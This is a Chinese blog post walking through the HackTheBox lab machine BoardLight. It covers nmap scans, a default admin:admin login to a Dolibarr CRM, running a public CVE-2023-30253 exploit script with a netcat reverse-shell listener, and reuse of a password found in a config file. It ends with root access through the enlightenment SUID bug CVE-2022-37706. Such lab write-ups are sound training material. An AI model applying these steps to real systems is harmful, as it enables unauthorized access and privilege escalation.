首页 > 其他分享 >HTB-BoardLight靶机笔记

HTB-BoardLight靶机笔记

时间:2024-08-18 23:16:19浏览次数:13  
标签:bin http HTB tcp 11.11 usr BoardLight 10.10 靶机

BoardLight靶机笔记

概述

HTB的靶机BoardLight

靶机地址:https://app.hackthebox.com/machines/BoardLight

一、nmap扫描

1)端口扫描

-sT tcp全连接扫描 --min-rate 以最低速率10000扫描 -p- 扫描全端口

sudo nmap -sT --min-rate 10000 -p- -o ports 10.10.11.11
Warning: 10.10.11.11 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.11
Host is up (0.23s latency).
Not shown: 41074 closed tcp ports (conn-refused), 24459 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Sat Aug 17 20:10:36 2024 -- 1 IP address (1 host up) scanned in 100.49 seconds

2)详情探测

-sT tcp全连接扫描 -sV 探测端口服务版本 -sC 使用默认脚本扫描 -O 探测目标操作系统

sudo nmap -sT -sV -sC -O -p22,80 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.36s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
|   256 5903dc52873a359934447433783135fb (ECDSA)
|_  256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 17 20:12:43 2024 -- 1 IP address (1 host up) scanned in 44.29 seconds

3) 漏洞脚本扫描

sudo nmap --script=vuln -o vuln 10.10.11.11 
Nmap scan report for 10.10.11.11          
Host is up (0.46s latency).          
Not shown: 998 closed tcp ports (reset)                     
PORT   STATE SERVICE                              
22/tcp open  ssh                          
80/tcp open  http   
| http-csrf:                                                                                                         [0/105]
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.11
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/about.php
|     Form id: 
|     Form action: 
|     
|     Path: http://10.10.11.11:80/do.php
|     Form id: 
|_    Form action: 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

# Nmap done at Sat Aug 17 20:16:04 2024 -- 1 IP address (1 host up) scanned in 156.22 seconds

二、Web渗透

1)域名发现

image-20240818221856981

最底部发现域名 board.htb写进/etc/hosts文件中

sudo echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts 

对他进行子域名爆破和目录爆破

爆破处子域名 crm.board,htb写进/etc/hosts文件里

访问

http://crm.board.htb
image-20240818222440747

看到了一个cms框架,尝试弱口令admin:admin

登陆进来

image-20240818222622292

三、获得立足点

通过google搜索

找到了 : Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

根据github上边上的利用教程

kali本地

nc -lvvp 4444

利用脚本

python3 exploit.py http://crm.board.htb admin admin 10.10.14.69 4444

成功反弹shell

image-20240818224015384

找到配置文件

image-20240818224351276

找到了一组凭据

看一下用户

ls /home

larissa

ssh凭据 larissa:serverfun2$2023!!

连接ssh获得普通用户

ssh [email protected]

image-20240818224727458

四、提权到root

find / -perm -4000 -type f 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

看到enlightenment_sys,他有SUID提权漏洞

CVE-2022–37706

我们下载kail上,起一个php的80端口服务,在靶机上用wget下载下来 ,执行就可以到root

image-20240818225358375

拿到root的flag

总结

  1. 通过nmap扫描发现目标靶机开启了22,80端口
  2. 对80端口的http服务进行了目录爆破和子域名爆破,发现了doblarr的cms框架,通过google搜索,找到了 Exploit-for-Dolibarr-17.0.0-CVE-2023-30253漏洞的利用脚本。
  3. 通过利用cms的漏洞成功获得shell,通过对配置的阅读,发现了一组凭据larissa:serverfun2$2023!!,成功获得了用户的shell
  4. 通过enlightenment这个桌面管理组件的SUID的利用成功获得了root的shell。

标签:bin,http,HTB,tcp,11.11,usr,BoardLight,10.10,靶机
From: https://www.cnblogs.com/LING5/p/18366351

相关文章

  • HTB GreenHorn
    端口探测nmap-sC-sV-Pn--max-rate1000010.10.11.25得到22,80,3000端口观察80端口http重定向到了greenhorn.htbweb探测3000端口发现是一个代码仓库查看仓库里的代码,发现一个源码代码审计发现一个pass.phphash解密得到密码:iloveyou1不知道是哪的密码访问80的web......
  • SAR靶机笔记
    SAR靶机笔记概述SAR是Vulnhub上的靶机,大家可以去vulnhub网站上去进行下载。这里有链接:https://download.vulnhub.com/sar/sar.zip一丶常规的nmap扫描1)主机发现sn只做ping扫描,不做端口扫描nmap-sn192.168.84.1/24MACAddress:00:50:56:FA:CB:D3(VMware)N......
  • 一些免费好用的靶机渗透测试环境
    1、Vulhub:(各种漏洞环境集合,一键搭建漏洞测试靶场)https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2、Vulnhub:(国外实战靶场,适合入门提高)https://www.vulnhub.com/3、Vulnstack(红队实战靶场,域、横向渗透、多层网络,强烈推荐,目前共7个靶场,网上writeup......
  • Vulnhub JIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修......
  • sp eric靶机
    扫描IP端口扫描nmap192.168.111.146-p--sV目录扫描#使用命令dirsearch-u"http://192.168.111.146"访问靶机IP地址拼接访问admin.php,发现登录框界面,尝试sql注入,弱口令等,没有结果看看.git,使用githack下载源码#使用命令python2GitHack.py-uh......
  • Broken靶机
    查看靶机的mac地址使用kail进行扫描ip探测靶机主机,端口,服务nmap-sS-sS-A-p-192.168.154.137进行目录扫描dirsearch-uhttp://192.168.154.137拼接后没什么发现访问靶机ip访问readme.md发现是十六进制的值将内容写入到readme.md中使用xxd转换xxd-r-......
  • BlackMarket靶机复现【附代码】(权限提升)
    TheBlackmarket/BlackMarket靶机下载地址:https://www.vulnhub.com/entry/blackmarket-1,223/https://www.vulnhub.com/entry/blackmarket-1,223/1.主机发现+端口扫描+目录扫描+敏感信息获取1.1.主机发现nmap-sn192.168.7.0/24|grep-B2'08:00:27:D6:0A:18'1.2.......
  • VulnhubJIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择第二个,进入等待加载完成选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修改默认网卡......
  • HTB-Permx靶机笔记
    Permx靶机笔记概述permx靶机是HTB的简单靶机,这台靶机整体考验渗透人员的信息搜集能力,可以收只有信息搜集的快速,才能快速拿到它的flag。整体是比较简单的靶机靶机连接:https://app.hackthebox.com/machines/PermX一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--......
  • HTB-Permx靶机笔记
    Permx靶机笔记概述permx靶机是HTB的简单靶机,这台靶机整体考验渗透人员的信息搜集能力,可以收只有信息搜集的快速,才能快速拿到它的flag。整体是比较简单的靶机靶机连接:https://app.hackthebox.com/machines/PermX一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oport......